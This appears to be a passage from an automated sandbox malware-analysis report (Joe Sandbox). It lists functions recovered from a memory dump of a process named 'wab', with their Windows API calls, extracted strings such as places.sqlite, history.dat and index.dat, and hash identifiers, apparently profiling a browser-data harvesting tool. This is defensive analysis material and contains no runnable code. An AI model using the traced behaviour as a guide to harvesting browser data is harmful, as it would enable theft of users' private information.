                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                    Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000064), ref: 004175D0
                    • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotificationSleep
                    • String ID: }A
                    • API String ID: 1821831730-2138825249
                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                    Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@DeleteObject
                    • String ID: r!A
                    • API String ID: 1103273653-628097481
                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@
                    • String ID:
                    • API String ID: 1033339047-0
                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                    Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                    • memcmp.MSVCRT ref: 00444BA5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$memcmp
                    • String ID: $$8
                    • API String ID: 2808797137-435121686
                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                    Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                      • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                      • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                      • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                    • String ID:
                    • API String ID: 1042154641-0
                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                    Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                    • memset.MSVCRT ref: 00403A55
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                    • String ID: history.dat$places.sqlite
                    • API String ID: 3093078384-467022611
                    • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                    • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                    Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                    • GetLastError.KERNEL32 ref: 00417627
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$File$PointerRead
                    • String ID:
                    • API String ID: 839530781-0
                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID: *.*$index.dat
                    • API String ID: 1974802433-2863569691
                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                    Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@mallocmemcpy
                    • String ID:
                    • API String ID: 3831604043-0
                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                    Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                    • GetLastError.KERNEL32 ref: 004175A2
                    • GetLastError.KERNEL32 ref: 004175A8
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$FilePointer
                    • String ID:
                    • API String ID: 1156039329-0
                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ChangeCloseCreateFindNotificationTime
                    • String ID:
                    • API String ID: 1631957507-0
                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                    Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Temp$DirectoryFileNamePathWindows
                    • String ID:
                    • API String ID: 1125800050-0
                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                    Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: d
                    • API String ID: 0-2564639436
                    • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                    • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                    Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: BINARY
                    • API String ID: 2221118986-907554435
                    • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                    • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                    Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                    • String ID:
                    • API String ID: 1161345128-0
                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                    Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: /stext
                    • API String ID: 2081463915-3817206916
                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                    Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: .#v
                    • API String ID: 2081463915-507759092
                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                    Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                    • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                    • String ID:
                    • API String ID: 159017214-0
                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                    Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 3150196962-0
                    • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                    • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                    Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: malloc
                    • String ID: failed to allocate %u bytes of memory
                    • API String ID: 2803490479-1168259600
                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                    Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                    Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmpmemset
                    • String ID:
                    • API String ID: 1065087418-0
                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                    Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID:
                    • API String ID: 2221118986-0
                    • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                    • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                    • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
